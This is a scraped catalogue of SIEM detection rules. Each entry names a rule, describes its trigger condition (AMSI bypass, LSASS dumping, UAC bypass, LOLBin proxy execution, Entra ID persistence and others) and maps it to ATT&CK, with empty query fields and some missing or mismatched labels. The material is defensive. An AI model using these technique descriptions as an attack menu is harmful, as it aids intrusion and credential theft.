Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_PowerShell Rundll32 Remote Thread Creation Detected
Trigger Condition: This alert is triggered whenever it detects the creation of a remote thread from a Powershell process in a rundll32 process.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Powershell AMSI Bypass via dotNET Reflection
Trigger Condition: This alert is triggered whenever it detects a Request to amsiInitFailed that can be used to disable AMSI Scanning. AMSI is a feature in Windows that allows applications to request the scanning of scripts and other content for malicious behavior.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Powershell Code Execution via SyncAppvPublishingServer
Trigger Condition: This alert is triggered when arbitrary Powershell command is executed via SyncAppvPublishingServer.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Process Creation via Time Travel Tracer
Trigger Condition: This alert is triggered when a new child process is spawned via tttracer.exe.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Proxy Execution via Xwizard
Trigger Condition: This alert is triggered whenever execution of xwizard tool with “runwizard” and CLSID arguments are utilized to achieve proxy execution.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Pulse Secure Arbitrary File Reading Detected
Trigger Condition: This alert is triggered whenever exploitation of arbitrary file reading vulnerability (CVE-2019-11510) in Pulse Secure is detected.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Firewall, IDS, IPS
Query:
LP_Reconnaissance using Windows Binaries Detected
Trigger Condition: This alert is triggered whenever possible reconnaissance activities using windows binaries is detected such as execution of several discovery.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Registry Key Import Detected
Trigger Condition: This alert is triggered whenever registry key import is detected via regedit.exe.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows, Windows Sysmon
Query:
LP_Registry Run Key Pointing to a Suspicious Folder
Trigger Condition: This alert is triggered whenever it detects registry modification where the value of “Run” key is pointing to a suspicious folder.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Remote Code Execution using WMI Win32_Service Class over WinRM
Trigger Condition: This alert is triggered when Application Whitelisting Bypass and Arbitrary Unsigned Code Execution Technique is attempted, using winrm.vbs. It detects the execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed).
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows, Windows Sysmon
Query:
LP_Run PowerShell Script from ADS Detected
Trigger Condition: This alert is triggered whenever PowerShell script execution from Alternate Data Stream (ADS) is detected.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_RunOnce Registry Key Configuration Change
Trigger Condition: This alert gets triggered when the configuration of Run Once registry key is changed.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Rundll32 Internet Connection Detected
Trigger Condition: This alert is triggered whenever it detects a rundll32 that communicates with public IP addresses.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Scheduled Task Creation Detected
Trigger Condition: This alert is triggered whenever it detects the creation of scheduled task.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Shell Spawn via HTML Help Detected
Trigger Condition: This alert gets triggered when Hh (HTML Help) spawns shell processes.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows, Windows Sysmon
Query:
LP_Suspicious Atbroker Registry Change Detected
Trigger Condition: This alert is triggered whenever creation/modification of Assistive Technology registry value is detected.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows Sysmon
Query:
Trigger Condition: This alert is triggered whenever it detects execution of CSharp or FSharp interactive console by scripting utilities such as WScript, Cscript PowerShell, etc.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Suspicious Child Process Creation via OneNote
Trigger Condition: This alert is triggered whenever it detects creation of suspicious child processes, execution of binaries from non-default paths, and script file execution through OneNote.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Suspicious Code Page Switch Detected
Trigger Condition: This alert is triggered whenever switching of code page in the command line or batch scripts to a different, normally a rare language is detected.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Suspicious ConfigSecurityPolicy Execution Detected
Trigger Condition: This alert is triggered whenever file upload is detected via ConfigSecurityPolicy binary.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Suspicious DLL Execution Using Windows Address Book
Trigger Condition: This alert is triggered when suspicious DLL is executed using Wab.exe.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Suspicious Debugger Registration Detected
Trigger Condition: This alert is triggered whenever it detects the registration of a debugger for a program that is available in the logon screen (sticky key backdoor).
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Suspicious Download Using Diantz
Trigger Condition: This alert is triggered when a remote file is downloaded suspiciously using diantz.exe and is stored by compressing it into a .cab file on the local machine.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Suspicious Execution from Outlook
Trigger Condition: This alert is triggered whenever it detects EnableUnsafeClientMailRules used for Script Execution from Outlook.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Suspicious Execution of Dump64
Trigger Condition: This alert is triggered when suspicious usage of dump64.exe is detected.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Suspicious Execution of LNK File
Trigger Condition: This alert is triggered whenever execution of suspicious LNK files that either spawns powershell or command prompt and has high entropy in the command field is detected.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Suspicious Files Dropped in Perflogs Folder
Trigger Condition: This alert is triggered whenever an EXE or DLL file is dropped in Windows’s Perflog directory.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Suspicious HWP Sub Processes Detected
Trigger Condition: This alert is triggered whenever it detects suspicious Hangul Word Processo (Hanword) sub-processes that could indicate exploitation.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Suspicious Invocation of Microsoft Workflow Compiler
Trigger Condition: This alert is triggered when usage of Microsoft Workflow Compiler is detected.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Suspicious LSASS Dump Creation in CrashDumps
Trigger Condition: This alert is triggered whenever it detects the creation of an LSASS dump file in %LocalAppData%CrashDumps folder, which is in context of NT/Authority is C:Windowssystem32configsystemprofileAppDataLocalCrashDumps, possibly patterns seen in LSASS Shtinkering attack.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Suspicious LoadAssembly PowerShell Diagnostic Script Execution
Trigger Condition: This alert detects the use of a Microsoft signed script to execute commands and bypass AppLocker.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows
Query:
LP_Suspicious Outbound RDP Connections Detected
Trigger Condition: This alert is triggered whenever it detects non-standard tools initiating outbound connections over TCP port 3389, indicating possible lateral movement using Remote Desktop Protocol (RDP).
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Suspicious PowerShell Parameter Substring Detected
Trigger Condition: This alert is triggered whenever it detects PowerShell invocation with a suspicious parameter substring.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Suspicious RDP Redirect Using TSCON Detected
Trigger Condition: This alert is triggered whenever it detects a suspicious RDP session redirect using tscon.exe.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Suspicious Remote Binary Usage Detected
Trigger Condition: This alert is triggered whenever remote.exe binary is used to bypass application whitelisting and execute or run a local/remote file.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows, Windows Sysmon
Query:
LP_Suspicious Scripting in a WMI Consumer
Trigger Condition: This alert is triggered whenever it detects suspicious scripting in WMI Event Consumers.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows Sysmon, PowerShell
Query:
LP_Suspicious Setup Information File Invoked via DefaultInstall
Trigger Condition: This alert gets triggered when InfDefaultInstall.exe is used to install an INF file.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows, Windows Sysmon
Query:
LP_Suspicious Svchost Process Detected
Trigger Condition: This alert is triggered whenever any suspicious svchost process creation is detected.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Suspicious Sysmon Driver Unload Detected
Trigger Condition: This alert is triggered when suspicious unload of SysmonDrv Filter Driver is detected.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Suspicious Usage of SQLToolsPS Detected
Trigger Condition: This alert rule is triggered when it detects the proxy execution of PowerShell code through the SQLToolsPS.exe.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Suspicious Usage of Windows Binaries for Ingress Tool Transfer
Trigger Condition: This alert is triggered whenever it detects suspicious activities of windows binaries for indicative attempts of ingress tool transfer.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Suspicious WMIC ActiveScriptEventConsumer Created
Trigger Condition: This alert is triggered whenever WMIC is executed to create a event consumer.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
Trigger Condition: This alert is triggered whenever if a Windows program executable is detected to started in a suspicious folder.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_System Network Configuration Discovery
Trigger Condition: This alert is triggered whenever discovery of network configuration via system utilities like ipconfig, route, netsh, etc is detected.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows, Windows Sysmon
Query:
LP_TerraMaster TOS CVE-2020-28188 Exploitation
Trigger Condition: This alert is triggered whenever possible exploitation of the TerraMaster TOS vulnerability CVE-2020-28188 is detected. CVE-2020-28188 is a remote command execution (RCE) vulnerability in TerraMaster TOS <= 4.2.06 that allows remote unauthenticated attackers to inject OS commands.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Firewall, Proxy Server
Query:
LP_UAC Bypass via CMLUA or CMSTPLUA
Trigger Condition: This alert is triggered whenever user CMLUA OR CMSTPLUA DLL is loaded to perform user account control(UAC) bypass.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows Sysmon
Query:
Trigger Condition: This alert is triggered whenever high risk vulnerability is detected in low impact assets.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Qualys, Vulnerability Management
Query:
LP_VM - Medium Risk Vulnerability on High Impact Assets
Trigger Condition: This alert is triggered whenever medium risk vulnerability is detected in high impact assets.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Qualys, Vulnerability Management
Query:
LP_VM - Medium Risk Vulnerability on Medium Impact Assets
Trigger Condition: This alert is triggered whenever medium risk vulnerability is detected in medium impact assets.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Qualys, Vulnerability Management
Query:
LP_VMware View Planner CVE-2021-21978 Exploitation
Trigger Condition: This alert is triggered whenever possible exploitation of the VMware View Planner vulnerability CVE-2021-21978 is detected. CVE-2021-21978 is a flaw due to proper input validation and lack of authorization leading to arbitrary file upload in logupload web application.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Firewall, Proxy Server
Query:
LP_WER Full User Mode Dumps Enable Detected
Trigger Condition: Alert Trigger: This alert is activated upon detecting a modification to the registry value “DumpType,” set to 2, located within the HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsWindows Error ReportingLocalDumps key. This registry configuration, introduced with Windows Server 2008 and Windows Vista SP1, enables the collection and local storage of full user-mode dumps following a user-mode application crash. It’s important to note that applications employing custom crash reporting mechanisms, such as .NET applications, are not supported by this feature.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_WMI Persistence - Script Event Consumer Detected
Trigger Condition: This alert is triggered whenever it detects Windows Management Instrumentation (WMI) script event consumers.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_WSL Execution Detected
Trigger Condition: This alert is triggered whenever possible usage of Windows Subsystem for Linux (WSL) binary is used to execute linux commands.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows, Windows Sysmon
Query:
LP_WannaCry Sources in Connections to Sinkhole Domain
Trigger Condition: This alert is triggered whenever a source tries to connect to wannacry sinkhole domain.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Firewall, IDS, IPS, Web Server
Query:
LP_Windows Defender Antivirus Definitions Removal Detected
Trigger Condition: This alert is triggered when Microsoft Defender Antivirus signature definitions are removed from the system.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
Trigger Condition: This alert is triggered whenever it detects suspicious parent processes of well-known Windows processes.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Windows RDP Port Modified
Trigger Condition: This alert is triggered whenever remote desktop protocol (RDP) for windows protocol is modified.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Windows Security Health Disable via Registry Modification
Trigger Condition: This alert is triggered whenever Windows Security Health registry values are added/modified to set it to a disabled state.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows, Windows Sysmon
Query:
LP_Windows User Account Created via Command Line
Trigger Condition: This alert is triggered whenever the creation of a user account via CLI like PowerShell or via net utility is detected. The creation of a user account is a process by which a user or administrator creates a new user profile on a system. Attackers may create new user accounts to maintain or enhance their access to a system or domain. This can be used as a means of persistence, where the attacker can maintain access to a compromised system even if their initial access is detected and removed. Alternatively, the attacker may create new accounts with elevated privileges to expand their access to additional resources or systems. Effective monitoring and access controls can help detect and prevent unauthorized account creation and mitigate the risks associated with this type of attack.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_XSL Script Processing Detected
Trigger Condition: This alert is triggered whenever application control bypass attempt via execution of embedded scripts inside Extensible Stylesheet Language (XSL) files is detected.This alert also detects another variation of this technique, dubbed “Squiblytwo” that utilizes WMI to invoke JScript or VBScript within an XSL file. XSL stands for Extensible Stylesheet Language and is used to express the style sheets. It supports scripting to do formatting on XML files. Adversaries may abuse XSL to bypass application whitelisting and execute arbitrary code due to its legitimate functionality.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
Trigger Condition: Inbox rule configured in Microsoft Exchange to manipulate incoming emails containing specific terms like phish, malware and alert.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Email Hiding Rules
ATT&CK ID: T1564.008
Minimum Log Source Requirement: Office365
Query:
LP_Successful Microsoft 365 Login with Reconnaissance User Agents
Trigger Condition: User agents associated with known reconnaissance tools like AADInternals and AzureHound, presented during successful logins to Microsoft 365.
ATT&CK Category: Discovery
ATT&CK Tag: Permission Groups Discovery, Cloud Account, Cloud Service Discovery
ATT&CK ID: T1069, T1087.004, T1526
Minimum Log Source Requirement: Office365
Query:
LP_Sensitive Mail Read Application Permission Assigned
Trigger Condition: Application in Microsoft Entra ID (formerly Azure AD) with the Mail.Read permission granted.
ATT&CK Category: Persistence
ATT&CK Tag: Additional Email Delegate Permissions
ATT&CK ID: T1098.002
Minimum Log Source Requirement: Office365
Query:
LP_Multiple Exchange Mailboxes Accessed via API in Short Span
Trigger Condition: High number of mailboxes accessed via an API, such as Microsoft Graph API or Exchange Web Services, within a short period.
ATT&CK Category: Collection
ATT&CK Tag: Remote Email Collection
ATT&CK ID: T1114.002
Minimum Log Source Requirement: Office365
Query:
LP_Microsoft Purview eDiscovery Activities
Trigger Condition: Microsoft purview activities related to searching for files and data in all of Sharepoint, Exchange and public folders via edisocvery were performed or the search results were exported. Microsoft Purview eDiscovery is a legal compliance tool that helps organizations search for, identify, collect, and export data for legal investigations, litigation and compliance audits.
ATT&CK Category: Collection, Exfiltration
ATT&CK Tag: Email Collection, Exfiltration Over Web Service
ATT&CK ID: T1114, T1567
Minimum Log Source Requirement: Office365
Query:
LP_Microsoft Purview Audit Disabled
Trigger Condition: Microsoft Purview Audit (formerly Advanced Auditing) subscription removed from a user.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Disable or Modify Cloud Logs
ATT&CK ID: T1562.008
Minimum Log Source Requirement: Office365
Query:
LP_Microsoft 365 Unified Audit Logging Disabled
Trigger Condition: Disabling of Unified Audit Log in Microsoft 365 (formerly Office 365).
ATT&CK Category: Defense Evasion
ATT&CK Tag: Disable or Modify Cloud Logs
ATT&CK ID: T1562.008
Minimum Log Source Requirement: Office365
Query:
LP_Microsoft 365 Multiple MFA Prompt Denied
Trigger Condition: User denied multiple MFA prompts.
ATT&CK Category: Credential Access
ATT&CK Tag: Multi-Factor Authentication Request Generation
ATT&CK ID: T1621
Minimum Log Source Requirement: Office365
Query:
LP_File with Suspicious Extension Sent in Microsoft Teams Message
Trigger Condition: File with a potentially dangerous extension, such as .exe, .bat and .ps1, shared within a Microsoft Teams chat or channel.
ATT&CK Category: Persistence
ATT&CK Tag: Additional Email Delegate Permissions
ATT&CK ID: T1098.002
Minimum Log Source Requirement: Office365
Query:
LP_File Shared to Guest in SharePoint
Trigger Condition: SharePoint file shared with an external guest user.
ATT&CK Category: Collection
ATT&CK Tag: Sharepoint
ATT&CK ID: T1213.002
Minimum Log Source Requirement: Office365
Query:
LP_Exchange Mailbox Folder Delegation Configured
Trigger Condition: Addition of delegation permissions to the Exchange mailbox folders.
ATT&CK Category: Persistence
ATT&CK Tag: Additional Email Delegate Permissions
ATT&CK ID: T1098.002
Minimum Log Source Requirement: Office365
Query:
LP_Exchange Mailbox Delegation Configured
Trigger Condition: Addition of delegation permissions to an Exchange mailbox.
ATT&CK Category: Persistence
ATT&CK Tag: Additional Email Delegate Permissions
ATT&CK ID: T1098.002
Minimum Log Source Requirement: Office365
Query:
LP_Exchange Mailbox Audit Bypass Configured
Trigger Condition: Use of Set-MailboxAuditBypassAssociation cmdlet to exempt a user or service account from mailbox audit logging in Exchange Online.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Disable or Modify Cloud Logs
ATT&CK ID: T1562.008
Minimum Log Source Requirement: Office365
Query:
LP_Exchange Email Auto Forward Enabled
Trigger Condition: Email auto-forwarding within Exchange mailbox which can lead to data leakage, especially if configured to send emails to external addresses without proper authorization.
ATT&CK Category: Collection
ATT&CK Tag: Email Forwarding Rule
ATT&CK ID: T1114.003
Minimum Log Source Requirement: Office365
Query:
LP_Entra ID User Consent Denied for OAuth Application
Trigger Condition: User denied consent to an OAuth application requesting permissions.
ATT&CK Category: Credential Access
ATT&CK Tag: Steal Application Access Token
ATT&CK ID: T1528
Minimum Log Source Requirement: Office365
Query:
LP_Entra ID Suspicious Permission Granted to Application
Trigger Condition: User granted consent to an application with suspicious privileges.
ATT&CK Category: Persistence
ATT&CK Tag: Additional Cloud Roles
ATT&CK ID: T1098.003
Minimum Log Source Requirement: Office365
Query:
LP_Entra ID Suspicious Authorization Policy Updated
Trigger Condition: Updated Entra ID/Azure AD authorization policy to grant user consent to apps identified as risky by Microsoft Entra ID Protection.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Impair Defenses
ATT&CK ID: T1562
Minimum Log Source Requirement: Office365
Query:
LP_Entra ID Privileged Role Assignment via PIM
Trigger Condition: Addition of a privileged role user through Microsoft Entra Privileged Identity Management (PIM).
ATT&CK Category: Persistence
ATT&CK Tag: Additional Cloud Roles
ATT&CK ID: T1098.003
Minimum Log Source Requirement: EntraID
Query:
LP_Entra ID Privileged Role Assignment
Trigger Condition: Privileged role assigned to a user or a service principal in Entra ID.
ATT&CK Category: Persistence
ATT&CK Tag: Account Manipulation, Additional Cloud Roles
ATT&CK ID: T1098, T1098.003
Minimum Log Source Requirement: Office365
Query:
LP_Entra ID Privileged Application Role Assignment by Service Principal
Trigger Condition: Privileged application roles assigned to security principals in Entra ID by service principals.
ATT&CK Category: Persistence
ATT&CK Tag: Account Manipulation, Additional Cloud Roles
ATT&CK ID: T1098, T1098.003
Minimum Log Source Requirement: Office365
Query:
LP_Entra ID PowerShell Sign-In
Trigger Condition: User logged in using the Azure Active Directory PowerShell module, Azure CLI, or sign-ins using the Microsoft Graph PowerShell SDK.
ATT&CK Category: Execution, Defense Evasion
ATT&CK Tag: Cloud API, Cloud Accounts
ATT&CK ID: T1059.009, T1078.004
Minimum Log Source Requirement: EntraID
Query:
LP_Entra ID New Owner Added to Service Principal or Application
Trigger Condition: Successfull addition of a new owner to a service principal or application.
ATT&CK Category: Persistence, Privilege Escalation
ATT&CK Tag: Additional Cloud Roles
ATT&CK ID: T1098.003
Minimum Log Source Requirement: Office365
Query:
LP_Entra ID High Risk User Sign-In
Trigger Condition: When Microsoft Entra ID Protection flags user sign-in activities as “at risk.”
Minimum Log Source Requirement: EntraID
Query:
LP_Entra ID Full Access Permission Assigned to Application
Trigger Condition: User granted full access to office and office applications.
ATT&CK Category: Persistence
ATT&CK Tag: Additional Email Delegate Permissions, Additional Cloud Roles
ATT&CK ID: T1098.002, T1098.003
Minimum Log Source Requirement: Office365
Query:
LP_Entra ID External User Invited
Trigger Condition: External guest user invited within ENTRA ID.
ATT&CK Category: Persistence
ATT&CK Tag: Cloud Account
ATT&CK ID: T1136.003
Minimum Log Source Requirement: Office365
Query:
LP_Entra ID Device Code Authentication Detected
Trigger Condition: Successful authentication using a device code authenticator.
ATT&CK Category: Initial Access, Credential Access
ATT&CK Tag: Steal Application Access Token, Phishing
ATT&CK ID: T1528, T1566
Minimum Log Source Requirement: Office365
Query:
LP_Entra ID Credential Added to Application or Service Principal
Trigger Condition: Addition of a new credential, either a client secret or certificate, to an application or service principal within Microsoft Entra ID.
ATT&CK Category: Persistence
ATT&CK Tag: Additional Cloud Credentials
ATT&CK ID: T1098.001
Minimum Log Source Requirement: Office365
Query:
LP_Entra ID Conditional Access Policy Modification
Trigger Condition: Addition or update of a Microsoft Entra Conditional Access policy.
ATT&CK Category: Persistence
ATT&CK Tag: Conditional Access Policies
ATT&CK ID: T1556.009
Minimum Log Source Requirement: EntraID
Query:
LP_Entra ID Conditional Access Policies Implementing MFA Deleted
Trigger Condition: When users deleted conditional access policies implementing Multi-Factor Authentication (MFA).
ATT&CK Category: Credential Access
ATT&CK Tag: Multi-Factor Authentication
ATT&CK ID: T1556.006
Minimum Log Source Requirement: EntraID
Query:
LP_Entra ID Conditional Access Policies Blocking Device Code Authentication Modified
Trigger Condition: When users deleted or modified conditional access policies preventing Device Code Authentication flow.
ATT&CK Category: Modify Authentication Process
ATT&CK Tag: Sharepoint
ATT&CK ID: T1556
Minimum Log Source Requirement: EntraID
Query:
LP_Creation of Anonymous Sharing Link in SharePoint
Trigger Condition: Creation of anonymous sharing links in SharePoint.
ATT&CK Category: Collection
ATT&CK Tag: Sharepoint
ATT&CK ID: T1213.002
Minimum Log Source Requirement: Office365
Query:
LP_Block Network Connections from EDR via WFP
Trigger Condition: When an Endpoint Detection and Response (EDR) network connection is blocked by the Windows Filtering Platform (WFP).
ATT&CK Category: Defense Evasion
ATT&CK Tag: Impair Defenses
ATT&CK ID: T1562
Minimum Log Source Requirement: Windows
Query:
LP_RDP Extension File Dropped in Outlook Folder
Trigger Condition: Creation of a file with .rdp extension in the Outlook folder.
ATT&CK Category: Initial Access, Lateral Movement
ATT&CK Tag: Remote Desktop Protocol, Spearphishing Attachment
ATT&CK ID: T1021.001, T1566.001
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_File Creation with RTLO Character for Filename Obfuscation
Trigger Condition: Detects file creation events where filenames use the Right-to-Left Override (RLO) character (U+202E) to disguise malicious extensions (e.g., .msc or .exe) as legitimate document formats (e.g., .pdf, .docx).
ATT&CK Category: Initial Access, Defense Evasion
ATT&CK Tag: Right-to-Left Override, Spearphishing Attachment
ATT&CK ID: T1036.002, T1566.001
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Suspicious AutoIt Execution
Trigger Condition: Execution of a suspicious AutoIt in a suspicious context. Adversaries leverage AutoIt for automation and payload delivery due to its flexibility and ability to evade detection.
ATT&CK Category: Execution
ATT&CK Tag: AutoHotKey & AutoIT
ATT&CK ID: T1059.010
Minimum Log Source Requirement: Windows, Windows Sysmon
Query:
LP_CVE-2024-38112 Exploitation Detected
Trigger Condition: This alert is triggered whenever it detects events where svchost.exe process has spawned iexplore.exe process and the same iexplore.exe process has drop an “.hta” file.
ATT&CK Category: Execution
ATT&CK Tag: Command and Scripting Interpreter, PowerShell
ATT&CK ID: T1059, T1059.001
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Certipy Tool Execution for AD CS Abuse
Trigger Condition: This rule detects the execution of Certipy, a hacktool commonly used for Active Directory Certificate Services (AD CS) abuse. Digital certificates are often used to sign and encrypt messages and/or files. Certificates are also used as authentication material. Certipy is part of a suite of tools developed for Red Team operations and security testing. It allows attackers to interact with AD CS to enumerate and exploit configurations and vulnerabilities. It is particularly useful for abusing certificate templates, forging certificates, and performing privilege escalation attacks. Adversaries may use this tool to steal or forge certificates used for authentication to access remote systems or resources. False positives for this rule are unknown.
ATT&CK Category: Credential Access
ATT&CK Tag: Steal or Forge Authentication Certificates
ATT&CK ID: T1649
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Certify Tool Execution for AD CS Abuse
Trigger Condition: This rule detects execution of Certify, a hacktool commonly used for Active Directory Certificate abuse. Digital certificates are often used to sign and encrypt messages and/or files. Certificates are also used as authentication material. Certify is part of a suite of tools developed for Red Team operations and security testing. It allows attackers to interact with AD CS to enumerate and exploit configurations and vulnerabilities. It is particularly useful for abusing certificate templates, forging certificates, and performing privilege escalation attacks. Adversaries may use this tool to steal or forge certificates used for authentication to access remote systems or resources. False positives for this rule is unkown
ATT&CK Category: Credential Access
ATT&CK Tag: Steal or Forge Authentication Certificates
ATT&CK ID: T1649
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Password Dumper Activity on LSASS
Trigger Condition: Process handle on the LSASS process with a specific access mask and SAM_DOMAIN object type. Tools like Mimikatz create a process handle on the LSASS process with an elevated access mask for dumping purposes. This alert detects Mimikatz lsadump attempts.
ATT&CK Category: Credential Access
ATT&CK Tag: LSA Secrets
ATT&CK ID: T1003.004
Minimum Log Source Requirement: Windows
Query:
LP_Disabling of UAC Detected
